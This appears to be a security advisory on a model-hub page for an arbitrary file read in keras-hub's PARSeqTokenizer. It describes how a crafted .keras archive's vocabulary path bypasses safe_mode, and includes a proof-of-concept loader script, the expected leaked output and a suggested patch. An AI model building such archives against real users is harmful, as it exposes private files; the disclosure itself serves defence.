PARSeqTokenizer Arbitrary File Read via Crafted .keras Archive

Vulnerability: keras_hub.models.PARSeqTokenizer reads an attacker-controlled file path from config.json during model deserialization with no safe mode guard.

Impact: Loading a crafted .keras file reads any file accessible to the process and exposes its content in model.vocabulary. safe_mode=True does not protect this path.

CVE status: No CVE assigned. Distinct from CVE-2025-12058 (keras core StringLookup) and not covered by keras-hub PR #2517 (which patched BytePair/WordPiece/SentencePiece but not PARSeqTokenizer).

Root cause

keras_hub/src/models/parseq/parseq_tokenizer.py:

def set_vocabulary(self, vocabulary):
    if isinstance(vocabulary, str):
        with open(vocabulary, "r", encoding="utf-8") as file:  # no in_safe_mode() check
            self.vocabulary = [line.rstrip() for line in file]
            self.vocabulary = "".join(self.vocabulary)

Compare with the correctly patched BytePairTokenizer (PR #2517):

if isinstance(vocabulary, str):
    if serialization_lib.in_safe_mode():
        raise ValueError("Requested loading a vocabulary file outside model archive...")
    with open(vocabulary, "r", encoding="utf-8") as f:
        ...

Affected versions

keras-hub 0.25.0 and later (PARSeq was added in PR #2089, August 27, 2025). Live-confirmed on 0.25.1 (PyPI) and 0.29.0.dev0 (source).

Reproduction

Requirements:

pip install keras==3.12.1 keras-hub tensorflow

Step 1: Create the target file (simulates the victim's sensitive file):

echo -e "SENSITIVE_LINE_ONE
SENSITIVE_LINE_TWO" > /tmp/parseq_poc_target.txt

Step 2: Run the PoC script:

# poc_parseq_file_read.py
import sys
from unittest.mock import MagicMock
sys.modules.setdefault("tensorflow_text", MagicMock())

import keras
import keras_hub  # required: registers keras_hub>PARSeqTokenizer

# The .keras file in this repo has vocabulary="/tmp/parseq_poc_target.txt"
model = keras.models.load_model("malicious_parseq.keras", safe_mode=True)
print("model.vocabulary:", repr(model.vocabulary))
# Prints the content of /tmp/parseq_poc_target.txt

Expected output:

[!] load_model returned: <PARSeqTokenizer ...>
model.vocabulary: 'SENSITIVE_LINE_ONESENSITIVE_LINE_TWO'
[+] SUCCESS - file content read via safe_mode=True load_model()

Note on tensorflow_text: assert_tf_libs_installed() is a functional prerequisite in all keras-hub tokenizers. The mock above satisfies it. In a real attack environment, both tensorflow and tensorflow-text are installed.

Note on import keras_hub: keras_hub must be imported before load_model() to register the PARSeqTokenizer class in the Keras registry. This is standard in any environment using keras-hub models.

Full self-contained PoC

See poc_parseq_file_read.py in this repo. It dynamically creates a target file and a malicious archive, loads the model, and prints the leaked content.

Why safe_mode=True does not protect

keras deserializer (serialization_lib.py:816) resolves keras_hub classes unconditionally:

if package in {"keras", "keras_hub", "keras_cv", "keras_nlp"}:
    # class resolved without any safe_mode gate

SafeModeScope is active during from_config(), but PARSeqTokenizer.set_vocabulary() never calls in_safe_mode(). So the scope is a no-op for this code path.

Additionally, the archive has exactly 3 files (config.json, metadata.json, model.weights.npz). This causes saving_lib.py:484 to set asset_store = None, and saving_lib.py:806 to skip load_assets() entirely -- so no archive-embedded vocabulary overwrites the attacker-supplied path.

Suggested fix

Add an in_safe_mode() guard matching the pattern from PR #2517:

from keras_hub.src.saving import serialization_lib

def set_vocabulary(self, vocabulary):
    if isinstance(vocabulary, str):
        if serialization_lib.in_safe_mode():
            raise ValueError(
                "Requested loading a vocabulary file outside the model archive. "
                "Pass safe_mode=False if you trust the source."
            )
        with open(vocabulary, "r", encoding="utf-8") as file:
            ...

Downloads last month: 36

Inference Providers NEW

This model isn't deployed by any Inference Provider. 🙋 Ask for provider support